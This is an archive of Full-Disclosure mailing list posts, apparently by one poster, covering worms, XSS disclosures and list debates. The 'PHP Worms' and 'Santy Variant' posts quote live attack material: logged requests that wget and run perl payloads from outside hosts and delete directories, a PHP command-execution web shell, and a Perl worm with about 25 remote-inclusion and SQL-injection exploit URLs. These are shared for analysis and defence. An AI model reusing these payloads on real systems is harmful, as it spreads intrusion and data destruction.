Re: [Full-Disclosure] Re: Followup to T-Mobile hack
More info on the hacking http://www.parishiltonsmobile.com/ On Tue, 22 Feb 2005 09:40:58 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote: One top star reached Sunday morning expressed total outrage at Paris. Is Dubya a star...? (Maybe a shooting star. Won't last long.) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] How T-Mobil's network was compromised
Wait untill he's out (or earlier), a book will no doubt be written :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] hushmail.com, is this true?
To me this suggests that, unlike most web based e-mail providers such as hotmail, hushmail does not send the user's I.P address in the headers of the e-mail address, but hushmail still logs IP addresses. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] PHP Worms
I thought these had stopped? I'm still seeing thousands of them each day: GET/read100.phprush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; * 20 GET /read100.phprush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd61;perl%20sess_189f0f0889555397a4de5485dd61;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd66;perl%20sess_189f0f0889555397a4de5485dd66;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd65;perl%20sess_189f0f0889555397a4de5485dd65;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd67;perl%20sess_189f0f0889555397a4de5485dd67;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd61;perl%20sess_189f0f0889555397a4de5485dd61;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd66;perl%20sess_189f0f0889555397a4de5485dd66;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd65;perl%20sess_189f0f0889555397a4de5485dd65;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd67;perl%20sess_189f0f0889555397a4de5485dd! 67;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd61;perl%20sess_189f0f0889555397a4de5485dd61;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd66;perl%20sess_189f0f0889555397a4de5485dd66;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd65;perl%20sess_189f0f0889555397a4de5485dd65;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd67;perl%20sess_189f0f0889555397a4de5485dd67;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd61;perl%20sess_189f0f0889555397a4de5485dd61;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd66;perl%20sess_189f0f0889555397a4de5485dd66;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd65;perl%20sess_189f0f0889555397a4de5485dd65;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd67;perl%20sess_189f0f0889555397a4de5485dd67;rm%20-rf%20*;cd%20%20/usr/l! ocal/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f08 89555397a4de5485dd61;perl%20sess_189f0f0889555397a4de5485dd61;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd66;perl%20sess_189f0f0889555397a4de5485dd66;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd65;perl%20sess_189f0f0889555397a4de5485dd65;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd67;perl%20sess_189f0f0889555397a4de5485dd67;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 * 3 GET /read100.phprush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; * 1500 (just from today) They seem to be getting promptly deleted from the host server (i'm yet to find a live one) but I was under the impression that the initial burst was over? -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: Re[2]: [Full-Disclosure] Amazon.com is down
looks like an attempt to initiate a DDoS on Amazon from FD readers going to check if it's up or down :)) but you'd have to be a complete moron to think that that would work.. And if it truely was a joke (i hope to god not) then I do not beleive it is us that are Humour Impaired.. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions
I hate to say this.. but it's actually quite good. Picked up spyware i'd been forced to manually disable (because adaware+spybotsd didn't see it) and gave me an *option* to remove kazaa et al (as, whilst they contain spyware i may want to keep them). ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Santy Variant attacking about 50 PHP-applications
Also the spy.gif script: CENTER DIV STYLE=font-family: verdana; font-size: 25px; font-weight: bold; color: #F3A700;SPYKIDS PHP Command/Safemode Exploit 4.1/DIV BR DIV STYLE=font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;Informação do sistema/DIV ?php // Ae galera se forem Ripar coloca pelo menos um escrito sobre o DeRf- pod crer closelog( ); if ($chdir == ) $chdir = getcwd( ); ? TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 ?php ? TR TDDIV STYLE=font-family: verdana; font-size: 15px;?= $info ?: ?= $value ?/DIV/TD /TR TR TR TDDIV STYLE=font-family: verdana; font-size: 15px;/DIV/TD /TR TR TDDIV STYLE=font-family: verdana; font-size: 15px;/DIV/TD /TR TR TDDIV STYLE=font-family: verdana; font-size: 15px;/DIV/TD /TR TR TDDIV STYLE=font-family: verdana; font-size: 15px;/DIV/TD /TR TR TDDIV STYLE=font-family: verdana; font-size: 15px;Server IP: ?php $aaa = gethostbyname($SERVER_NAME); echo $aaa;?/DIV/TD /TR TR TDDIV STYLE=font-family: verdana; font-size: 15px;Web Server: ?= $SERVER_SOFTWARE $SERVER_VERSION; ?/DIV/TD /TR /TABLE BR ?php if ($cmd != ) { echo DIV STYLE=\font-family: verdana; font-size: 15px;\[*] Command Mode Run/DIV; ? DIV STYLE=font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;Comandos LNX/DIV ?php if ($fe == 1){ $fe = exec; } if ($fe == ){ $fe = passthru; } if ($fe == 2){ $fe = system; } if (isset($chdir)) @chdir($chdir); ob_start( ); $fe($cmd 21); $output = ob_get_contents(); ob_end_clean( ); ? TEXTAREA COLS=100 ROWS=15 STYLE=font-family: verdana; font-size: 12px; ?php if (!empty($output)) echo str_replace(, gt;, str_replace(, lt;, $output)); ? /TEXTAREA BR ?php } if ($safemode != ) { echo DIV STYLE=\font-family: verdana; font-size: 15px;\[*] Safemode Mode Run/DIV; ? DIV STYLE=font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;Safe Mode Directory Listing/DIV ?php if ($dir = @opendir($chdir)) { echo TABLE border=1 cellspacing=1 cellpadding=0; echo TR; echo TD valign=top; echo bfont size=2 face=arialList All Files/b brbr; while (($file = readdir($dir)) !== false) { if (@is_file($file)) { $file1 = fileowner($file); $file2 = fileperms($file); echo font color=green$file1 - $file2 - a href=$SCRIPT_NAME?$QUERY_STRINGsee=$file$file/abr; // echo font color=green$file1 - $file2 - $file /fontbr; flush( ); } } echo /TD; echoTD valign=top; echo bfont size=2 face=arialList Only Folders/b brbr; if ($dir = @opendir($chdir)) { while (($file = readdir($dir)) !== false) { if (@is_dir($file)) { $file1 = fileowner($file); $file2 = fileperms($file); echo font color=blue$file1 - $file2 - a href=$SCRIPT_NAME?$QUERY_STRINGchdir=$chdir/$file$file/abr; // echo font color=blue$file1 - $file2 - $file /fontbr; } } } echo /TD; echoTD valign=top; echo bfont size=2 face=arialList Writable Folders/bbrbr; if ($dir = @opendir($chdir)) { while (($file = readdir($dir)) !== false) { if (@is_writable($file) @is_dir($file)) { $file1 = fileowner($file); $file2 = fileperms($file); echo font color=red$file1 - $file2 - $file /fontbr; } } } echo /TD; echo /TD; echo TD valign=top; echo bfont size=2 face=arialList Writable Files/b brbr; if ($dir = opendir($chdir)) { while (($file = readdir($dir)) !== false) { if (@is_writable($file) @is_file($file)) { $file1 = fileowner($file); $file2 = fileperms($file); echo font color=red$file1 - $file2 - $file /fontbr; } } } echo /TD; echo /TR; echo /TABLE; } } ? ?php if ($shell == write) { $shell = '#!/usr/bin/perl # # ShellBOT - Atrix Team # # 0ldW0lf - [EMAIL PROTECTED] # - www.atrix-team.org # - www.atrix.cjb.net # # modificado por poerschke # irc.chatplus.com.br #spykids # CONFIGURACAO # my $processo = /hsphere/shared/apache/bin/httpd -DSSL;#Nome do processo que vai aparece ps # #-- my $linas_max=10; # Evita o flood :) depois de X linhas # #-- my $sleep=4; # ele dorme X segundos # # IRC # my @adms=(poerschke); #
Re: [Full-Disclosure] Santy Variant attacking about 50 PHP-applications
Covered on the F-Secure weblog, the DNS has been pointed at 127.0.0.2 so no more bots will be connecting. Just posting the source incase 5wk.com dies: #!/usr/bin/perl # # # # # # # # # ## # ### # # # # # # ### ## # ## ### # # # ## # # ## # # # # # # # # # # # use LWP::Simple; use IO::Socket::INET; my $processo = /usr/local/sbin/httpd; $SIG{INT} = IGNORE; $SIG{HUP} = IGNORE; $SIG{TERM} = IGNORE; $SIG{CHLD} = IGNORE; $SIG{PS} = IGNORE; $0=$processo.\0x16;; my $pid=fork; exit if $pid; die Problema com o fork: $! unless defined($pid); $lista[0] = '/modules/My_eGallery/public/displayCategory.php?basepath=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[1] = '/modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[2] = '/include/new-visitor.inc.php?lvc_include_dir=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[3] = '/_functions.php?prefix=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[4] = '/cpcommerce/_functions.php?prefix=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[5] = '/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[6] = '/modules/agendax/addevent.inc.php?agendax_path=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[7] = '/ashnews.php?pathtoashnews=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[8] = '/eblog/blog.inc.php?xoopsConfig[xoops_url]=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[9] = '/pm/lib.inc.php?pm_path=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[10] = '/b2-tools/gm-2-b2.php?b2inc=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[11] = '/modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[12] = '/modules/agendax/addevent.inc.php?agendax_path=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[13] = '/includes/include_once.php?include_file=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[14] = '/e107/e107_handlers/secure_img_render.php?p=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[15] = '/shoutbox/expanded.php?conf=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[16] = '/modules.php?name=NukeJokesfile=printjokeid=-1/**/UNION/**/SELECT/**/aid,pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*'; $lista[17] = '/admin.php?op=AddAuthoradd_aid=cakeadd_name=Godadd_pwd=brasnet[EMAIL PROTECTED]add_radminsuper=1admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'; $lista[18] = '/main.php?x=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[19] = '/myPHPCalendar/admin.php?cal_dir=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[20] = '/index.php/main.php?x=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[21] = '/index.php?include=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[22] = '/index.php?x=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[23] = '/index.php?open=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[24] = '/index.php?visualizar=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget http://www.5wk.com/spybot'; $lista[25] = '/template.php?pagina=http://www.5wk.com/spy.gif?cmd=cd /tmp;wget http://www.5wk.com/spyworm1;perl spyworm1;wget
Re: [Full-Disclosure] Just a thought (from an autoreply to another thread)
Indeed, but as mentioned in another FD post (something along the lines of don't mind me, just getting the xmas auto replies) how many do we know aren't honey pots? or being closely monitored? It could alll be an elaborate scheme.. On Fri, 31 Dec 2004 23:14:43 -0500, Byron L. Sonne [EMAIL PROTECTED] wrote: You know, people that set these auto-replies often give out a good amount of information (of the social engineering kind and otherwise), if someone were to apply themselves... Schwarzwaelder, Joerg wrote: I will not be in the office at least until January 9th, 2005. Please send - ssh, watchdog and hvu relocation issues to Alexander Bossert - firewall issues to [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] YET AGAIN Automatic remote compromise of InternetExplorer Service Pack 2 XP SP2
About switching to FireFox: if you drive a car you might end up in a car-crash, changing cars doesn't prevent that. If 90% of people would be driving the exact same car, it's obvious most car-crashes will involve that car. Worst internet/rea life analogy ever. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Plesk 7 Cross-Site Scripting
Vendor: SW-Soft URL: http://www.sw-soft.com/ Version: Plesk 7.0.0 Risk: Cross-Site Scripting Description: Plesk is comprehensive server management software developed specifically for the Hosting Service Industry with the assistance of Web hosting professionals. Time tested tough in real world hosting environments this award winning control panel software has proven itself for years to be simply the best. Cross Site Scripting: There's a cross-site scripting vulnerability in the login page for Plesk 7, another case of improperly secured POST data. An attacker can inject data into the page through the login_name variable on the login page (login_up.php3). An example can be found here: http://www.wheresthebeef.co.uk/XSS/plesk.7.html The CSS isn't done through a GET request, it is done through POST and can be exploited in the form of a form. Solution: The vendor hasn't replied to any of my e-mails but they do appear to have fixed this problem. *Hello SW-Soft, if you're watching!* -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Contact BankOne.com ?
Hi, Has anyone got any idea how i can contact BankOne.com or anyone that can for me? I don't have an account with them which apparently means my e-mails to them aren't SECURE. Thanks, Andrew Smith. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Lycos Europe organizing a DDoS attack against spammers
A get to http://makelovenotspam.com/intl/static/ is what the screen saver does initially. I can not see this lasting long; 1) Whatever they say, they're breaking the law 2) They're DDoSing spammers, the people with millions of bots / gigabits of bandwidth under their control.. we can see now that the spammers have alread retaliated. I haven't been able to access makelovenotspam.com for days. On Wed, 1 Dec 2004 12:47:05 -0600, Kevin [EMAIL PROTECTED] wrote: On Tue, 30 Nov 2004 13:38:31 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote: Lycos Europe organizing a DDoS attack against spammers Lycos Europe has started organizing a distributed denial-of-service attack against web sites run by spammers. Lycos, via its makelovenotspam.com website, is offering a free screensaver for download. The screensavers make constant http requests to spam websites. Can anybody provide pointers on how to detect this traffic by reviewing squid proxy logs? I'd guess that at least a few of our (thousands of) users will install makelovenotspam, but lacking the authority to lock down or examine desktops, I'm limited to reviewing access logs after the fact to track down offenders. Thanks, Kevin Kadow ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] this is fun?
..Or if you're fortunate enough to use Windows (?), the screen jumps around whilst the wav HEY EVERYONE, I'M LOOKING AT GAY PORNO loops. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Secret Vulns: Places of confusion
Ooh! A boast thread, goody! There are many vulnerabilities in many .gov websites, i think the fact that you might get arrested and/or labelled a terrorist deters most people. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Sorry to offend those that use IRC legitimately (LOL - find something else to chat with your buddies), but why the hell are we not pushing to sunset IRC? because you can't, i'm not sure what you think IRC is.. but it isn't one network run by a few geeks. It's thousands of networks accross the world, open source IRC servers and millions/billions(?) of users. You can't stop IRC because people do bad things there, this is the internet.. what do you expect? -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around? (Because anything less would be uncivilized)
Well, fellow F-D'ers, thanks to the vast array of intelligence and experience found on this list, my rant about abolishing IRC has been proven to be far from a solution. I..can't tell if it's sarcasm or not, damn those trolls and their mind poisoning ways. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Why is IRC still around?
Danny: there's not need to keep replying, this is a mailing list. Here's what happens: 1) Question posted. 2) Valid replies posted. 3) 30-40 others repeat replies at 2) 4) In come the trolls.. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Click and Build eCommerce Platform Cross Site Scripting
ClickandBuild: http://apply.clickandbuild.com/ Online eCommerce platform. Vulnerability The vulnerability lies in the listPos variable in the script running at cashncarrion.co.uk. It does not properly secure user inputted variables, presumably as the user is not supposed to input the variable but can do easily through the URL. I was not able to find any other unchecked variables that are printed, but there could be more. More information and examples can be found here: http://www.wheresthebeef.co.uk/XSS/clicknbuild.html and here: http://www.wheresthebeef.co.uk/XSS/cash.n.carrion.co.uk.html The vendor has been informed and claim to have fixed this problem. -- zxy_rbt2 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] dab@heise.de
Interesting, i haven't noticed any. I guess gmail is picking them up? On Fri, 12 Nov 2004 12:44:44 -0300, Jeff Donahue [EMAIL PROTECTED] wrote: Obviously this is usual, because the list is unmoderated... Either get a good AV or keep from clicking the executable attachments. ;) - Original Message - From: Stephen Hunt [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, November 11, 2004 5:35 PM Subject: [Full-Disclosure] [EMAIL PROTECTED] Wow, 2nd day on this list and already a windows worm sent to it. Is this a regular occurrence? -Steve ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] TRUSTe.org Cross-Site-Scripting Phishing oppurtunities
Website: http://truste.org Background: TRUSTe® is an independent, nonprofit organization dedicated to enabling individuals and organizations to establish trusting relationships based on respect for personal identity and information in the evolving networked world. Through extensive consumer and Web site research and the support and guidance of many established companies and industry experts, TRUSTe has earned a reputation as the leader in promoting privacy policy disclosure, informed user consent, and consumer education. TRUSTe's members include eBay, Apple, MSN, NYTimes and many other big, scary corporations. Description: Truste's 'ivalidate.php' is used to validate trusted sites. Whilst the script does add slashes to quotes and closes script and style tags, there are a number of HTML tags it does not strip, including linK,div,iframe. This leaves the site open to attack from phishers wanting to make their site appear trusted. Further information can be found here: http://wheresthebeef.co.uk/XSS/ TrustE.org were informed of the vulnerability through various e-mail addresses 5 days ago, they are yet to respond or fix the problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68
Today I got e-mail from 69.197.83.68 CANADA ISP which has undetectable virus. This just means that you or your A/V hasn't updated their virus definitions. Try multiple A/V programs, this will cover a wider range of 'viruses'. Well I downloaded this file but I didn't run it because I know it is virus. Good call. and now I am complaining to rogers.com ISP about this matter. Bad Call. Chances are this wasn't intentionally sent to you, the person who did execute the virus themselves without realising and it proceeded to email itself to you and hundreds of other people. I doubt rogers.com will care or be able to do anything. Best bets would be to report this virus to A/V Vendors. There is no such thing as in undectable virus, right now i could write a .bat file to delete key files on your system upon execution. Anti Virus producs wouldn't pick it up, it's just a bat file, sent to one person. If it isn't being picked up as a virus then you may want to consider switching anti virus software. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] why o why did NASA do this.
Am i the only one that noticed the time stamps? These are 6 years old On Sun, 17 Oct 2004 01:17:59 -0600, Mike Diehl (Encrypted email preferred) [EMAIL PROTECTED] wrote: On Thursday, October 14, 2004 3:13 PM, Deigo Dude wrote: ftp://ftp.hq.nasa.gov/pub/nickname/ The list contains the full name, email, phone, fax, position, building, room, and employer. When will they learn. Does anyone know where I can get their Social Security Numbers? I tried Goggle with little success! Personally identifying information of government, or any, employees should not be subject to Freedom of Information. The risks, which the government isn't responsible for, are just too great for these people. If I use the FOIA to get his information, at least I had to use my RealName (tm) to get it. Posting this on the web is simply irresponsible. JMHO ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Norton AntiVirus 2005 treats Radmin as a Virus ??!
That's not Radmin, that's a 'dropper' to silenty install radmin..intended almost always for use as a trojan. So of course NAV will pick it up as a virus. On Wed, 13 Oct 2004 11:38:36 +0200 (CEST), Feher Tamas [EMAIL PROTECTED] wrote: Ill Will wrote: oops... http://www.illmob.org/0day/ghostradmin.zip Trojandropper.Win32.RDM.a ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Quicky Analysis of a Proxy/Zombie Network
wow, interesting stuff. Never seen anything like that before :-) On Wed, 13 Oct 2004 13:40:35 +1300, VeNoMouS [EMAIL PROTECTED] wrote: there u go guys - Original Message - From: Gregory Gilliss [EMAIL PROTECTED] To: Steele [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Wednesday, October 13, 2004 11:08 AM Subject: Re: [Full-Disclosure] Quicky Analysis of a Proxy/Zombie Network Bravo! Excellent work! -- Greg On or about 2004.10.12 15:41:16 +, Steele ([EMAIL PROTECTED]) said: For your consideration: http://lowkeysoft.com/proxy/ screenshots included :) be gentle, -- Gregory A. Gilliss, CISSP E-mail: [EMAIL PROTECTED] Computer Security WWW: http://www.gilliss.com/greg/ PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal.
This is the internet. This isn't your home, your car, your wallet. This is the internet. Offline analogies do not work. They also make my brain hurt, please do not use them. Whilst breaking a weak lock is criminal on the internet and in real life, it's also a hell of a lot easier to do on the internet, and a hell of a lot harder to get caught. The fact that something is illegal discourages no-one, the fact that they may get caught and punushed discourages most. The amount of laws it is possible to break by clicking a few links is insane, and only ever enforced if a large corporation is involved. I don't know what you expect from this rant, but i am quite concerned that someone with a CitiGroup (a bank?!) email address is talking about credit cards being stolen and weak locks. On Fri, 08 Oct 2004 10:26:13 -0400, KF_lists [EMAIL PROTECTED] wrote: Who pissed in your Wheaties? -KF Clairmont, Jan M wrote: I just don't understand people who think by using some cheap trick they get into my files or website and hack them, that they have no personal responsibility. It's insane to think and criminal that anything you can get into is fair game. Just because I have a cheap lock you can break does not make invading my home or personal property yours. Eh gods man, how does this type of idiotic logic prevail, just becasue I lost my wallet does not constitute your right to use my credit card, atm card and personal information for your enrichment. Because you can get into some sieve unsecured systems gives you the right to exploit or rape a persons bank account, steal their identity and generally destroy someone's life. I have found a number of wallets and purses and returned them intact to the rightful owners, as I have done with computer systems that my friends, neightbors and clients have used with vulnerablilties or virii. Sometimes they didn't even know I helped or fixed something. You know why because I respect the privacy and property of others. And if you don't, you deserve the indignation and the handcuffs they put on you when they drag you down to chinatown, baby. Compute Fair, Compute Fun, Compute secure Jan Clairmont Paladin of Security, Take no Prisoners! Unix Security Support/Consultant ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal.
Am i the only one concerned at the childish behavious on these mailing lists? I've not been reading for so long, but in my second or third email to these lists i've been told that someone 'doesn't care' about me and my 'weak brain'. And now this 'OK. You're wrong.' ? Is this neccesary? I beleive Morning_Wood raises some good points. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Simple but Effective Spam Harvester Solutions
Not entirely sure if this is appropriate for full-disclosure. Ah Well. As you may well know there are programs that scour the internet looking for email addresses, some people attempt to thwart them writing emails like my_email (AT) mydomain (DOT) com. These don't really work, so i figured some of my own out. They appear to have been successful, i will share them with you now. Using HTML Escape characters is a popular method, eg: a href=mailto#58;escchar#64;shiz#46;bizcontact me/a This works quite well but is easy to defeat (more on HTML escape chars: http://www.theukwebdesigncompany.com/articles/entity-escape-characters.php) I then started toying with JavaScript, this worked great. Here are some examples: script document.write('a href=mailto:js1'); document.write('@shiz.biz'); document.write('contact me/a'); /script script var a=@shiz.biz document.write('a href=mailto:'); var b=js2 document.write(b); document.write(a); /script contact me/a script language=Javascript src=a.htm/script script language=Javascript src=b.htm/script script document.write(a href=mailto:;); document.write(a+b); /scriptcontact me/a Also, worked pretty well. As it gets more complicated it's far harder to defeat. Then i found PHP could be used, creating a file called 'mail.php' and entering: ?php header(Location: mailto:[EMAIL PROTECTED]) ? into it, meant that linking to mail.php would launch an email. Anyways, more info can be found 